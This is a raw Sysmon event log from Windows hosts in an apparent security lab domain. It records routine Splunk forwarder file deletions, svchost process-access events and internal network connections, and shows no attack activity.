AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=555F38B686F272BB858F519E5BF7999E,SHA256=8C2B46D326578E5889B4E75A1D51E8FEDAFA457FBA4CBFF859ADC33F53DE0C89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439966Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:32.242{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF6D87B16FDE505C185A131C847E3EA9,SHA256=BA698EA62DB16F62AA71621A77C7A64C5C19553ABCF239F45BA7E01045C4811D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439965Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:32.101{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439964Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:32.101{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439972Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:33.776{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=461FA62C1329F17D68B9BE1CD50A7200,SHA256=0156CF33866FE7F21813B522B969D2509EB48193C5273A016EEF1BD1B61AB194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291328Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:33.689{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EE1E4541128B68EC004807DC9F1A0AF,SHA256=85FA348AD2E3E6F81F4DFD62DFC65DEDB84287CD27E98A948833C29F2F0513A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439971Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:29.666{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62385-false10.0.1.12-8000- 10341000x8000000000000000439970Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:33.102{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439969Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:33.102{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000291327Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:31.445{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50604-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291326Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:33.151{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1A4722147526BCF643A1E6C0876D7A5,SHA256=69E8C47E662136C56FD78FF5DA2A36FFEC2F12EDA31E28612116333A1A49288E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291325Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:33.151{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A63DB2331913246C88BB3F88B376635,SHA256=73F20BA91854BEF908FB3A3E0B53DF7AF80F4391B00808C548E46F8706E6A7B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291329Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:34.708{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD49BE5776AC306762C0D80732FA21A3,SHA256=71BA5ED64C6E7DF39EDFE36B96F62A6254E133B9F1494F6FD0E8D488C417EAB4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439974Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:34.103{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439973Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:34.103{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291330Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:35.710{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D970590CD613C6AEC154145E00B6DE1A,SHA256=3A1AD733983B247EFE76D2C9B37D5CDC3CFC09EAA2D2182ECC2DF14C126123FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439977Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:35.103{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439976Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:35.103{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439975Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:35.007{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=637229E7761C4D4530949525DA84639C,SHA256=69F6C593179631EECCA1859CBE97DF5368D8997FDC3FFE0F2E826AF091E8F52D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291331Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:36.710{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8574A2A829189259F46620D89B3F8E21,SHA256=EB994EEA54E715DB2E6A3AEF93139F8C51E05F21E85C4C8C08F132DD919138C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439980Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:36.104{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439979Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:36.104{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439978Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:36.010{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D009C6EAA444FDDF83CDA548FCB39A5,SHA256=7C516F6699EBDDC1196A7C22F9731D3AC4E589BE5A51B520961ED7DBF5B37750,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291332Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:37.725{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ADE139C864302AF47BED41B31A65D32,SHA256=C2FDB902240FB4799F408A01137D5AD999AD606CC1C4054D9983589894F082DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439983Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:37.105{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439982Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:37.105{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439981Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:37.052{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9E72AF62B05175ECD82D9415B56D07D,SHA256=69669B81CBEECF2828113D1ECA1FBF231710EB35495A114899E92706EA500F6A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291336Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:36.469{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50605-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291335Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:38.742{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CDD9E0B5721A5C94DFC5D889E0C200E,SHA256=5EA2C5DC2A584D60A4ECF03B82FDAECA9F4E048E4D1436CCC50D60C9B12D32E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439989Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:35.542{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62386-false10.0.1.12-8000- 23542300x8000000000000000439988Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:38.285{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=550A90005A632348388FA7D5E4A9AD1E,SHA256=0BC53889DC948CD027AC8C908C7BFF68D31A130BDA7843DDC9F8FFC3E0E3FDB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291334Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:38.311{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A04F90E0B3D082C7DE3F2032EDB0201E,SHA256=AA756C142C43E72E53BE573217AFF15DC796B6386941636899063F0ADC4EFAB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291333Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:38.311{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1A4722147526BCF643A1E6C0876D7A5,SHA256=69E8C47E662136C56FD78FF5DA2A36FFEC2F12EDA31E28612116333A1A49288E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439987Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:38.108{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C73FD208D0B614DBBE7B163E9E46A757,SHA256=06F319E8A554AA84D19A89D99C2CC73328498E5A1D5ADF5691F237DE04D10789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439986Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:38.107{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=555F38B686F272BB858F519E5BF7999E,SHA256=8C2B46D326578E5889B4E75A1D51E8FEDAFA457FBA4CBFF859ADC33F53DE0C89,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439985Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:38.106{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439984Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:38.106{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291337Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:39.775{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A83B116BB675D760C40CABF981C7E2E9,SHA256=97619402CEBE331E547D4D06CB8E15CED6CEA36F35AB32D46069DEC4816075DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439992Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:39.516{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=426E4A60829505C974A46ECB0026A61D,SHA256=78B72C3590244A56D13253F7770F071CE2B0AD102E83B57CDC943523255782A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439991Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:39.107{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439990Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:39.107{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439995Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:40.538{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B18E7FBA507B573F515EDF6096FC3B7,SHA256=A541C444AC04AF493368A4BF4903EDDBD5C01FF86EDDD814093C049E9C1C138F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291338Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:40.793{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68D48BC11758ADC1702B187C737C06CA,SHA256=28A19226D59CE996B822ED3C0F5C5DDFB57D81B39D5FD982460C43FAE2109602,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439994Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 